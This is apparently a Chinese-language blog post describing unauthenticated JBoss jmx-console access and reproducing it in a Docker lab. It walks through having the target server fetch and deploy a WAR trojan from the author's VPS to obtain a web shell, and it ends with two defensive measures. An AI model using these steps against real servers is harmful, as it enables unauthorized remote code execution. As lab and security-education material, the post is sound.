淺談未授權漏洞——Jboss未授權getshell
阿新 • • 發佈:2020-08-29
0x01 漏洞描述
JBoss是一個基於J2EE的開放原始碼應用伺服器,程式碼遵循LGPL許可,可以在任何商業應用中免費使用;JBoss也是一個管理EJB的容器和伺服器,支援EJB 1.1、EJB 2.0和EJB3規範。,預設情況下訪問 http://ip:8080/jmx-console 就可以瀏覽 JBoss 的部署管理的資訊不需要輸入使用者名稱和密碼可以直接部署上傳木馬有安全隱患。
0x02 環境搭建
目標靶機:mac os ip:192.168.2.85 攻擊機:windows 7 ip:192.168.2.86 木馬伺服器:centos ip:39.xxx.xxx.88 //安全起見隱藏個人vps
1.使用docker拉取Jboss映象,並且執行Jboss
docker search testjboss
docker pull testjboss/jboss:latest
docker images
docker run -p 8080:8080 -d 5661a2e31006
0x03 漏洞復現
未授權放分訪問
http://192.168.2.85:8080/jmx-console/ 無需認證進入控制頁面
利用jboss.deployment部署shell
利用vps搭建遠端木馬伺服器
在下圖的地方訪問木馬伺服器http://39.xxx.xxx.88/test3693.war (圖片填寫地址有誤,請參考自己的vps地址)
上傳war包木馬成功
訪問http://192.168.2.85:8080/test3693/
漏洞利用成功...
0x04 防禦措施
- 對jmx控制頁面訪問新增訪問驗證。
- 進行JMX Console 安全配置。